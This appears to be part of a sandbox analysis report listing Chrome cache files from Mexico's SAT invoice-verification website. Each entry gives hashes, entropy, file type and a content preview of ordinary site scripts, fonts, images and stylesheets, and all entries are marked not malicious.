                                                                          Preview://----------------------------------------------------------..// Copyright (C) Microsoft Corporation. All rights reserved...//----------------------------------------------------------..// MicrosoftAjaxWebForms.js..Type._registerScript("MicrosoftAjaxWebForms.js",["MicrosoftAjaxCore.js","MicrosoftAjaxSerialization.js","MicrosoftAjaxNetwork.js","MicrosoftAjaxComponentModel.js"]);Type.registerNamespace("Sys.WebForms");Sys.WebForms.BeginRequestEventArgs=function(c,b,a){Sys.WebForms.BeginRequestEventArgs.initializeBase(this);this._request=c;this._postBackElement=b;this._updatePanelsToUpdate=a};Sys.WebForms.BeginRequestEventArgs.prototype={get_postBackElement:function(){return this._postBackElement},get_request:function(){return this._request},get_updatePanelsToUpdate:function(){return this._updatePanelsToUpdate?Array.clone(this._updatePanelsToUpdate):[]}};Sys.WebForms.BeginRequestEventArgs.registerClass("Sys.WebForms.BeginRequestEventArgs",Sys.EventArgs);Sys.WebForms.EndRequestEventArgs=fun

                                                                          Chrome Cache Entry: 208

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):10586
                                                                          Entropy (8bit):5.103728105800952
                                                                          Encrypted:false
                                                                          SSDEEP:192:6+WsfwikPWeukKndMK6n3lBgSL1j9ZhitdW:zwPWeuZdMPn3ngSJ/IW
                                                                          MD5:9074C04E325D29746F4384B32309A9B6
                                                                          SHA1:91D20E0C22B7EF87AC64F51ABE86BD3BF56127E5
                                                                          SHA-256:CC422949162DE0C36F1DDD391D7B85866AE8F1139853A58C0AC9FAF98939C66F
                                                                          SHA-512:AF7D14F3AEECC3C07E015D8995E7DD396BBA55D7CFEB9214728731B7B0C92EB9BDDD51CFD6E8DB4BEF451B22B3A56D1FCBFF39FC2AED0E798B5F4E9E9E786283
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Scripts/gobmx/main.js
                                                                          Preview://'use strict';....var MX = MX || {};....// Variable de la URL que se encuentra en Gruntfile.js para obtener la URl segun ambiente...MX.root ='https://framework-gb.cdn.gob.mx/';..MX.emailService = 'https://www.gob.mx/subscribe';..MX.trackingID = '';......MX.comscore = 'gobmx';..MX.path = MX.root + 'assets/';..MX.imagesPath = MX.path + 'images/';..MX.scriptsPath = MX.path + 'scripts/';..MX.stylesPath = MX.path + 'styles/';....MX.gobmxPath = 'https://www.gob.mx/';..../**.. * [getParse URL parse current URL].. * @return {[string]} [url ID].. */..var getParseURL = function() {.. var urlHost = window.location.host,.. urlPath = window.location.pathname,.. host = urlHost.toLowerCase().split( '.' ),.. path = urlPath.toLowerCase(),.. hostClean = host.slice( 0, 2 ).join( '.' ),.. pathClean;.... if ( !isNaN( host[ 0 ] ) ) hostClean = urlHost;.... if ( path.indexOf( '.' ) !== -1 ) {.. var _end = path.indexOf( '.' );..

                                                                          Chrome Cache Entry: 209

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 19172, version 1.0
                                                                          Category:downloaded
                                                                          Size (bytes):19172
                                                                          Entropy (8bit):7.986272653969849
                                                                          Encrypted:false
                                                                          SSDEEP:384:Ilgjo21aYq24KoEX8J2ewKprK8lwNPz+TCD3nRmaKTdxZe:IlIjq24ku2exprKNVYA
                                                                          MD5:BC3AA95DCA08F5FEE5291E34959C27BC
                                                                          SHA1:7B7C670EF2F0BA7FC0CE6437E523CCBDC847FDE2
                                                                          SHA-256:8767F01CAA430C5BD4E3B008A8E9DFE022156A4E91A23C394FDCB05C267F1B94
                                                                          SHA-512:85CC524212A46027603F8D6874A7CAB0FA3073945D1E19114E078CEE8D3A569F223F29E46AE6193F50A6920999021F813DC8D31DB5E742193DAF03642E71771E
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Content/fonts/montserrat/montserrat-v14-latin-regular.woff2
                                                                          Preview:wOF2......J........D..J..........................X.."....`.....d..m.....,..6..(..6.$..>. .....h..U.....6.g.y.&..G;.a.[E.O......+...3..1.......1w....i.........Z......gH...d.:f.h8...f.T...~......zX|lw..N.|.o.'..r.M++>.p>..6[.....=(5..o'..Z.t.i......+.%..K.L9...(+...*s.....Q...!.....6/....l9v.......%...zf...*....v....a...$Py..y.V...f.6jD...*.f]..M...eq3.....J5...]....D.g@..]1BA...b.9e.G.5.o.w....I..*.......#$$.PQBL..Kc.u....w'....v......<..~...}_..V.<.......I.....{..U8].v&6.w...Y_W.VW.i......'....,2..v.X....D. ..5.L..a.G.}=.!...0..#!.lO...6.|!U.u...g6..C.Ms...:..[.u?.*q.VUv..p..6^....+..9..T.\.......#..X."l..A.l6...bJ.6..........5YN.QJ.8.Tf.2a(....@>.r.d.<..._...e...?0l.:......M.. '>=!(...'b...b..RQ:.f..^..aC:J...WP:*j.e..j.f+m*...9.n..;.\..?N.....[.s...+p..g#.L....g{E.\m..y.a....@J.. ....P@X*..0.....)i}..S.:G...%7p.2.r.B,....K.e.;.W...E...?q...;k2~..XH..j>.fO.t.....X.`.+X.B................C*.l9.a3.*Q(..y...e.......;.........dt..j.......M...;K."""""

                                                                          Chrome Cache Entry: 210

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 24 x 24
                                                                          Category:downloaded
                                                                          Size (bytes):2545
                                                                          Entropy (8bit):7.155350736412842
                                                                          Encrypted:false
                                                                          SSDEEP:48:HXvqZ5vmZv9Cd9c567nXCp1MWBXpSP+km6dAuzvdEKP:H/YJndGU7nyp1RXplkHdAiv6
                                                                          MD5:E6E64CCD6DF5F0F9AF773B9B11BC47CB
                                                                          SHA1:08E1943408BDC906A9E18F2A1132A96638661869
                                                                          SHA-256:1AA7AE8DCAF973282D89CACA5596EF55BA25552E196B1FE666945B81391B3C3C
                                                                          SHA-512:0068F7D631A2A3EAE7CED9C382E5092BEC191321A72528266EF090495B78C0B691EC690CEC060DC143DD644934B48B414F9FFAB2BE6A9F4B2DADA1B6BFC3E6C4
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Images/ajax-loader.gif
                                                                          Preview:GIF89a..........???....................................................................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!.......,........... .$.AeZ...<...Q46.<...A.......H.a....:....ID0.F...a\xG.3...!...O:-....Rj...TJ..*........t...........~."...ds]......)t...-"...i;H>.n.Qg]_*......R.3.....GI?.....v$...j3!.!.......,........... .$.0eZ..y..0..q ..P..W...)";..qX.^..D50......<H3.!.....k-.n..a. .(.i...d.$P@y.w`.J..#.....?..y........o...g.....f....'8..{..'C.p`j.n."...2.{.`x...jy.4...C,.4..o#n.$.....!.!.......,........... .$. eZ...$.2.....q....E. ....p$H@D/.....G.D.j8v#..P((D..... ..N.(3..#.y....(@...gUx*.kK.).....?K...............$..."....*.......K.....W......x..?.G...#.W....n.h.K,.....+.....*!.!.......,........... .$ .eZ..Y.$1..Q(c......O'"............. 1....q.d"..A.....V.x8p..4988.MRC.@....e*.3@.iI.)..'.?I.........@.......,.....#.........5..,.....".E..z...?..@.E...@.....).....*!.!.......,........... .$.(e..$....C.E1..;...('2$..

                                                                          Chrome Cache Entry: 211

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 309x42, components 3
                                                                          Category:dropped
                                                                          Size (bytes):14202
                                                                          Entropy (8bit):7.9399709052460326
                                                                          Encrypted:false
                                                                          SSDEEP:384:5rT1mLT/NSloH2GWZ40ponSNLKp0CU92+aUyyTcc:76CoHUq0pNWOCU92+aUyyTcc
                                                                          MD5:D6EBBB72744C1FCE8D75A15CBC326BFB
                                                                          SHA1:BEB8AE56562C046253E08D669143B1DAB54756C8
                                                                          SHA-256:CA03EA1F293B5E0BFE26FF4844E228907B537211DB34B523BC8F6ADFCF57E202
                                                                          SHA-512:A1D8AFE560B8169A98A314FC515398A3DD7BA7178BB30F28A96E19C9ED4BE58A7ABEDB91CF6291A397BF8F58C49F4AA42584007B30276D6C8B3C97B0C06753C7
                                                                          Malicious:false
                                                                          Preview:......JFIF.....d.d......Ducky.......d.....&Adobe.d................!......)...7x............................................................................................................................................*.5..................................................................................................P!2. 0"4..1#3$..........................!..1".AQ2#...Baq..R.$ Pb34u....%.......................!1..AQaq.2..."....Br# 0P.R..3.......................!1AQa.q.. P...0....................nil....lS...26P............-.=.x.z=h.:z..;i..B.........r1n.Y...:....4...s..9.f3......^.n|.[.[...!.A|Z........~M...Gn.*|!.J...b.s.......oGx.Zy.....C.Wj. 2.Y.....Zh.E..__...|}<.g7D..s...r..n......sokrw._....g.xN..@.5..=...4..r..(LwB.@.b.....C....._O.l_g...._.3...y...X.J..j.1lN.]>.+;4.o.N..m.n.....az.v..\..3...L...1..,..1...xV&$...s(.3..q...Wv.....W.O.....C.>.0.6Q.<|BR..,.>qL.....1.12.\....[.zm."....}..................................q......].......+I.].Q......*...4.'.y

                                                                          Chrome Cache Entry: 212

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 165 x 20, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):2323
                                                                          Entropy (8bit):7.878862786676429
                                                                          Encrypted:false
                                                                          SSDEEP:48:K+rGZXPs95Pfr1LZoJ/HHz+DCr+JosIuKFgDkF+XgQ0HM:fMPsbPtZoRiDivuKF+mI0HM
                                                                          MD5:34A1FF43589273CA202E1FA5BC6D110B
                                                                          SHA1:D257A59FDA9CB767B2089381932484F90D661D9E
                                                                          SHA-256:90EB6BE376630182DC8548CF0D827BC840B381A799E89ABCC3A404B6DAE890BB
                                                                          SHA-512:32782B75338940899E6E6BD4E5BF34A3316814187B49D476F382788A06083361D91E2AA751BAAEF1DBCE9C587F05AC1D2C697E891EE3EADA616A6D3500CC69D3
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Images/icons_full.png
                                                                          Preview:.PNG........IHDR....................sRGB.........IDATh..k.]U..;..!......\*.%.C..h.W.1...KbH`."T..".m...bb.....3<.....Q..O.F.S.F...wx..`QDa..O.:......{..t%.Yk.._k.{.:..s.%K....0.../..qOg<...0.!i..3....&.w......Q.[`....^|.8.m...)...........h..+u...\T....o*...>.p.....^...7..0..kx............$...!<.P.%..S.......uJ.9..~..&.......X...Z..jp.88...^...$..G....).....O.}.&..rF...S.n.....{..1..x.<...Z..m.[./j.6..0..P)..X.O...w.I.7......&.8p?x........\j......o...&....>.(W..Xj1.../...1.E.oY..?aW5..\..`p...W.,...-.N.T..`........_...^.jH...L...}6Z....@w......W.]t...7..R.....gC.t...o..S...'..O..jZ.....j....Df....bm..y.0.&..G....D.t|...a].G.70.qzdd.Y.{5x.L.....w..z.K...uWwW...f...`......O...........L...>..s.........\.>(.KL..........C....].....-...Ss.IAP..k.z[..z,..m..V..M.....1.........9p>..G.......#.^v$j.R...j.m.. ..E..x?X.l.Y.....K.0.M....~or;.W.w".6!..p|$.....@w......`4.c.....O.hM....&2...-.Z......B...........ljM7.+...I.h.*.;Q%.....>..<X.v....{.?Vc.t......#.).G

                                                                          Chrome Cache Entry: 213

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (12591), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):16437
                                                                          Entropy (8bit):5.273948983727031
                                                                          Encrypted:false
                                                                          SSDEEP:384:yXlYTr8HfuZjovgngj/EafeB0ymt4WQI7mYSaF1gC:yLH2BovggDEafs0ymmWQu5j
                                                                          MD5:C67CE9D137B35BA6B1F92644A9B72E1E
                                                                          SHA1:2B38A49FF683E2C5849F72D84EB574973CB5EE92
                                                                          SHA-256:4FF0BC82AF979987C9BFF222D548824DE262D2CA4DF6788129FC1C4B17E5632B
                                                                          SHA-512:6B7261C06B578FD1948314588964F04125F66D586C572AF86166261445C7C9A750651A38E0701F1A4D61969B81C3A76A7B88BCF70C829C8D65D029E9FCD832B1
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Scripts/gobmx.js
                                                                          Preview:/// <reference path="modernizr.js" />../// <reference path="modernizr.js" />../*! ** GOB.mx - Grafica Base v1.1.0 */..// ** ultima modificacion: '2-1-2016';....../* Modernizr (Custom Build) | MIT & BSD.. * Build: http://modernizr.com/download/#-shiv-printshiv-load-mq-cssclasses-svg.. */..;window.Modernizr=function(e,t,n){function x(e){f.cssText=e}function T(e,t){return x(prefixes.join(e+";")+(t||""))}function N(e,t){return typeof e===t}function C(e,t){return!!~(""+e).indexOf(t)}function k(e,t,r){for(var i in e){var s=t[e[i]];if(s!==n)return r===!1?e[i]:N(s,"function")?s.bind(r||t):s}return!1}var r="2.8.3",i={},s=!0,o=t.documentElement,u="modernizr",a=t.createElement(u),f=a.style,l,c={}.toString,h={svg:"http://www.w3.org/2000/svg"},p={},d={},v={},m=[],g=m.slice,y,b=function(e,n,r,i){var s,a,f,l,c=t.createElement("div"),h=t.body,p=h||t.createElement("body");if(parseInt(r,10))while(r--)f=t.createElement("div"),f.id=i?i[r]:u+(r+1),c.appendChild(f);return s=["&#173;",'<style id="s',u,'">',

                                                                          Chrome Cache Entry: 214

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):171
                                                                          Entropy (8bit):4.632229786684446
                                                                          Encrypted:false
                                                                          SSDEEP:3:rdxkouVKQMB3tGFUvzTIAKYkRZtoAcMdN4e/AHGeffUDF/0UbKKHacWWGu:rzQ4QW3tSUbTIJYkRZ0Mf4OAS/0UNHXJ
                                                                          MD5:5A68B858AD41438915E67BEB2F42372D
                                                                          SHA1:8AC95A3FF704E47D3F37EF025C8BB569F8B81A03
                                                                          SHA-256:AE083B063AD2CF1BF6D05FF5C3E950CC586382152A9E1FF864E611D05AA94C53
                                                                          SHA-512:075CA75FEACCED083A7C3C023DB9DD8C390F8C05F3333F1D9DDB4310ADC8C5C25055EFFE14B2DC655D253642A7F75D41B9303B513C8B7B987DD1FA576072732F
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Content/images/favicon.ico
                                                                          Preview:.<!DOCTYPE html>..<html>..<head>.. <title></title>...<meta charset="utf-8" />..</head>..<body>.. <h1>.. Recurso no encontrado.. </h1>..</body>..</html>..

                                                                          Chrome Cache Entry: 215

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):3049
                                                                          Entropy (8bit):4.562738584246836
                                                                          Encrypted:false
                                                                          SSDEEP:48:x324pelWiedmyEyF6avAmiCTGT2ImDT5PtVwTC8k:x32KeljEF6UZiCSiImDT5Pnw2Z
                                                                          MD5:B77259A8CC0C0BAD7FEA60F8B52AF9D2
                                                                          SHA1:784B60DA4C9365BFA72182FFBEC189630A0AAF6A
                                                                          SHA-256:2F5D6330C175704877879A188AB4D9A7E3D64772C954AE6E0C7613A63F6951CA
                                                                          SHA-512:954EA6800220F78CECD9CA11FE41B77FEDDA344A28A17F0C7D2407FC475A53058EFCE6A986FAA3699973BCC05D0F33B0D17613DE882760D66BD0855CC7A3313E
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Content/satMain.css
                                                                          Preview:.body {.. font-size: 18px;..}....span {.. display: inline-block;.. margin-bottom: 5px;.. font-weight: 700;..}.....styling {.. background: #f5f5f5;.. border: 1px solid #ccc;.. border-radius: 5px;.. padding: 20px;.. text-align: center;.. /* height: 150px;.. overflow: auto; */..}.....signin {.. display: inline;.. margin-bottom: 0px;.. font-weight: 300;..}.....seccion {.. background: white;.. border: 1px solid #eeeeee;.. border-radius: 3px 3px 0 0;.. margin: 10px 0 30px 0;.. moz-border-radius: 3px 3px 0 0;.. padding: 25px 25px;.. position: relative;.. webkit-border-radius: 3px 3px 0 0;..}.....btn {.. white-space: normal;..}.....derechaFondo {.. text-align: right;.. vertical-align: bottom;..}.....subtitle {.. margin-bottom: 15px;.. text-align: left;.. font-size: 14px;..}.....limpiarCampo {.. position: relative;.. left: -20px;.. top: 1px;.. height: 11px;.. width: 11px;.. cursor: pointer;..}.

                                                                          Chrome Cache Entry: 216

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format, TrueType, length 6896, version 1.0
                                                                          Category:downloaded
                                                                          Size (bytes):6896
                                                                          Entropy (8bit):5.878792980478225
                                                                          Encrypted:false
                                                                          SSDEEP:96:eSleH0BlES3WBhmNswwuwoDHqWnCJkN5FezIA05J3hHudnrcc6M5XDD:eJUHEC3NHwuBCJkNj29Ac6QD
                                                                          MD5:0AE25876A2EE7D3C3BC83C07D4C3EBE9
                                                                          SHA1:4D586339529406E981653A8E5984826A034C7D96
                                                                          SHA-256:79481CDCD235B25D170C92561784AEA14592D4E4C4130E71DB2E9A9D8C0A4839
                                                                          SHA-512:3A0E55C6F625BC06EE09A06CB4AFBB7625A4770E15705E194769AF13C76E3066E6F029D73933DC7E10A7D12A3D2928D1E6CA114008F09195483331AB63750500
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Content/fonts/icogobmx.woff?xc1rry
                                                                          Preview:wOFF........................................OS/2.......`...`...)cmap...h.........{@qgasp................glyf... ...|...|.4.Lhead.......6...6....hhea.......$...$.^..hmtx.......H...H7...loca...@...&...&&...maxp...h... ... ....name.......E...EW...post....... ... ...............................3...................................@.............@............... .............$.......d.......$.......d...@............. ............. .......................................L....................... ... ..............................`...`...........................79..................79..................79...........i........'..7.#..i.)..F.............N.S.............O..........!.!.%....'....7.........b.c.U................8......d...d...,...C,.8...............V.s.........!"&'..=.467>.3!2...........#.!"...........;.267>.=.467>.3!2...........;.267>.5.4&'..#1......+."&'..=.467>.;.2.......!"...........3!267>.5.4&'..#1.!"&'..5467>.3!2..........#15!"&'..5467>.3!2..........#1...3......................|.>.

                                                                          Chrome Cache Entry: 217

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):23063
                                                                          Entropy (8bit):4.7535440881548165
                                                                          Encrypted:false
                                                                          SSDEEP:384:GvUzYI+Vi4g1V5it1ONhA6w+Kv8i/4CYzLKL4DrLU0iTxZTAzIzrwDlTWMClQip9:bkON69kClQq8hDRJHp2tWU25Zt/gREVG
                                                                          MD5:90EA7274F19755002360945D54C2A0D7
                                                                          SHA1:647B5D8BF7D119A2C97895363A07A0C6EB8CD284
                                                                          SHA-256:40732E9DCFA704CF615E4691BB07AECFD1CC5E063220A46E4A7FF6560C77F5DB
                                                                          SHA-512:7474667800FF52A0031029CC338F81E1586F237EB07A49183008C8EC44A8F67B37E5E896573F089A50283DF96A1C8F185E53D667741331B647894532669E2C07
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/WebResource.axd?d=pynGkmcFUV13He1Qd6_TZHwW6XRihCOnHM9egjAHbYcsLY6sfUAO2WNK0odN5m-KEJzYuA2&t=638533548567617406
                                                                          Preview:function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {.. this.eventTarget = eventTarget;.. this.eventArgument = eventArgument;.. this.validation = validation;.. this.validationGroup = validationGroup;.. this.actionUrl = actionUrl;.. this.trackFocus = trackFocus;.. this.clientSubmit = clientSubmit;..}..function WebForm_DoPostBackWithOptions(options) {.. var validationResult = true;.. if (options.validation) {.. if (typeof(Page_ClientValidate) == 'function') {.. validationResult = Page_ClientValidate(options.validationGroup);.. }.. }.. if (validationResult) {.. if ((typeof(options.actionUrl) != "undefined") && (options.actionUrl != null) && (options.actionUrl.length > 0)) {.. theForm.action = options.actionUrl;.. }.. if (options.trackFocus) {.. var lastFocus = theForm.elements["__LASTFOCUS"];.. if ((typeo

                                                                          Chrome Cache Entry: 218

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                          Category:downloaded
                                                                          Size (bytes):43
                                                                          Entropy (8bit):3.0314906788435274
                                                                          Encrypted:false
                                                                          SSDEEP:3:CUkwltxlHh/:P/
                                                                          MD5:325472601571F31E1BF00674C368D335
                                                                          SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                          SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                          SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                          Malicious:false
                                                                          URL:https://sb.scorecardresearch.com/p2?c1=2&c2=17183199&ns_site=gobmx&name=verificacfdi.facturaelectronica.index
                                                                          Preview:GIF89a.............!.......,...........D..;

                                                                          Chrome Cache Entry: 219

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):95811
                                                                          Entropy (8bit):4.2320428591574135
                                                                          Encrypted:false
                                                                          SSDEEP:1536:HRR288TnjN+OErlJRd3zOnJcBhea09vZtlUJkqXF2TW:HMqFd3ywCtqN
                                                                          MD5:D54221941E772358A959861D3B4A4A87
                                                                          SHA1:F491DF9C1F822AD6E1528DEB4B7D6E5C1BF8F37E
                                                                          SHA-256:3383DA948D673BAB3636127152D3D8D5212D85BC553537F01554B2A829C17936
                                                                          SHA-512:BD378B8EBE2285B332B41DE41A61EA48043C0841C369CB835C28DB24E04289AA418F54DBB39F7F14D03F55225ADD7D952636F23FCBA9846A575361A4FBDF50C6
                                                                          Malicious:false
                                                                          Preview:<svg id="Capa_1" data-name="Capa 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 123.55 36.37"><defs><style>.cls-1{fill:#dac6a1;}.cls-2{fill:#fff;}</style></defs><title>Logo_128x50</title><path class="cls-1" d="M33.65,23.53a7.88,7.88,0,0,0-.6-2.5.28.28,0,0,0-.22-.09.17.17,0,0,0-.13,0v.09a8.69,8.69,0,0,1,.55,2.31A3.81,3.81,0,0,1,33,25a5.07,5.07,0,0,0,0,1.23c0,.17-.09.24-.16.24s-.15-.06-.16-.25c0-.47,0-.87-.06-1.22v0a7.88,7.88,0,0,0-.17-1.7A3.57,3.57,0,0,0,31.67,22a3.5,3.5,0,0,1-.44-1c0-.07,0-.14-.06-.23s-.05-.19-.08-.27L30.93,20a.13.13,0,0,0-.11-.05.29.29,0,0,0-.22.12.24.24,0,0,0,0,.16L31,21.77a2.89,2.89,0,0,0,.54.78h0a4.1,4.1,0,0,1,.34.41,1.26,1.26,0,0,1,.26.71c.07.52.13,1.26.19,2.32l.3,1.53a5,5,0,0,1-.07,1.7c0,.23,0,.3,0,.32h0s.11,0,.27-.17c.42-.52.4-2.27.38-3.68a6.53,6.53,0,0,1,.2-1.14,3.49,3.49,0,0,0,.15-1" transform="translate(-2.52 -6.68)"/><path class="cls-1" d="M32.12,21.23l0-.27a.34.34,0,0,0-.05-.14.5.5,0,0,0-.3-.24h-.13s0,0,0,.06a2.4,2.4,0,0,0,.72,1.44h.06s0-.05,0-.15l-.19-

                                                                          Chrome Cache Entry: 220

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):14398
                                                                          Entropy (8bit):3.861255126915413
                                                                          Encrypted:false
                                                                          SSDEEP:96:JZ1j3sROOdcLQS98DegKdGdSWiDSvcB6Utrq5swEtDlMzuaRfMrOca+N2KwbK1ec:Q/cLD99alctm5eBCr4uTKOqemB9
                                                                          MD5:B5D392D635C0FCB98B307EFBF794450E
                                                                          SHA1:4D13B4E3009A34C503FF9607F6C0C958FBC322A4
                                                                          SHA-256:216D242E6E114F62D00969B62AEEAB481DC0DDE5F55788C07BF61B3BC7C2B927
                                                                          SHA-512:0856975CCBF2D65575E1AC41E714AFE454D066941595E6687A94D4821803DDC9259E075E6F524762B0A5D446318BA68E538A13137255984A3AA7C1791E1861BA
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Scripts/Jquery/jquery.maskedinput.js
                                                                          Preview:./*..Masked Input plugin for jQuery..Copyright (c) 2007-2009 Josh Bush (digitalbush.com)..Licensed under the MIPL (Microsoft Public License)..Version: 1.2.2 (03/09/2009 22:39:06)..==================================================..Modified by: Axay.catl Valenzuela Faddul..Date: 2011-05..Description: 1) "paste" event modified in order to set caret on mask's last position...2) "blur" event unbinded...3) Setting caret on last match position when "focus" event occurs...4) Allow deletion of selected partial text...==================================================..Modified by: Miguel A. Palizada..Date: 2011-06..Description: 1) Supress clear mask method when lost focus or escape key pressed...2) Allow pasting for unformated text...3) Fix edition to prevent autocomplete behavior...4) Block edition when text completed...5) Hexadecimal charset definition added...==================================================..Modified by: Cristobal Espinosa Villase.or..Date: 2012-03-19..Descri

                                                                          Chrome Cache Entry: 221

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65329), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):102801
                                                                          Entropy (8bit):5.336080509196147
                                                                          Encrypted:false
                                                                          SSDEEP:1536:MGLiogSomRYvoGtT+KHsVS0bT79DSsi46j/LPyR7kbE:MGLXGFKT79DSs6WCE
                                                                          MD5:C89EAA5B28DF1E17376BE71D71649173
                                                                          SHA1:2B34DF4C66BB57DE5A24A2EF0896271DFCA4F4CD
                                                                          SHA-256:66B804E7A96A87C11E1DD74EA04AC2285DF5AD9043F48046C3E5000114D39B1C
                                                                          SHA-512:B73D56304986CD587DA17BEBF21341B450D41861824102CC53885D863B118F6FDF2456B20791B9A7AE56DF91403F342550AF9E46F7401429FBA1D4A15A6BD3C0
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/ScriptResource.axd?d=uHIkleVeDJf4xS50Krz-yPqbr3Ah7us24wZAnCCM2F8AgYCzZsY4mUc_XNtj-Xm14k9QllBneNK8RJhA6dNV9vVqPcB6QNXha041RYm3ONnVxrc2ET2RbUeNWb_8ZAnSLPPPSvpeHe3doGTQt8vIjs-OP3w1&t=2e7d0aca
                                                                          Preview://----------------------------------------------------------..// Copyright (C) Microsoft Corporation. All rights reserved...//----------------------------------------------------------..// MicrosoftAjax.js..Function.__typeName="Function";Function.__class=true;Function.createCallback=function(b,a){return function(){var e=arguments.length;if(e>0){var d=[];for(var c=0;c<e;c++)d[c]=arguments[c];d[e]=a;return b.apply(this,d)}return b.call(this,a)}};Function.createDelegate=function(a,b){return function(){return b.apply(a,arguments)}};Function.emptyFunction=Function.emptyMethod=function(){};Function.validateParameters=function(c,b,a){return Function._validateParams(c,b,a)};Function._validateParams=function(g,e,c){var a,d=e.length;c=c||typeof c==="undefined";a=Function._validateParameterCount(g,e,c);if(a){a.popStackFrame();return a}for(var b=0,i=g.length;b<i;b++){var f=e[Math.min(b,d-1)],h=f.name;if(f.parameterArray)h+="["+(b-d+1)+"]";else if(!c&&b>=d)break;a=Function._validateParameter(g[b],f

                                                                          \Device\Null

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\PING.EXE
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1117
                                                                          Entropy (8bit):4.80884400251175
                                                                          Encrypted:false
                                                                          SSDEEP:12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeT0sW3AFSkIrxMVlmJHaVzvv:/rVAokItULVDv
                                                                          MD5:0FE78EF9FFE52D9388487B77B6A9D553
                                                                          SHA1:CCD0F437074BF3042B92D4CA797CC6B7A9F603ED
                                                                          SHA-256:26ADB05EDC212A8F276837FF31F9DAD5E0B34B952AD9A5DF6528F73D2A25C2DA
                                                                          SHA-512:168DFDA0D4DD696C4CF9230245D7A416D233E59059E2B9ECE96AAEBE0B134BA9EE9304494F65EF01F1A33F6F0746D45E2D938A16B5F018CAF94BE32F2C320082
                                                                          Malicious:false
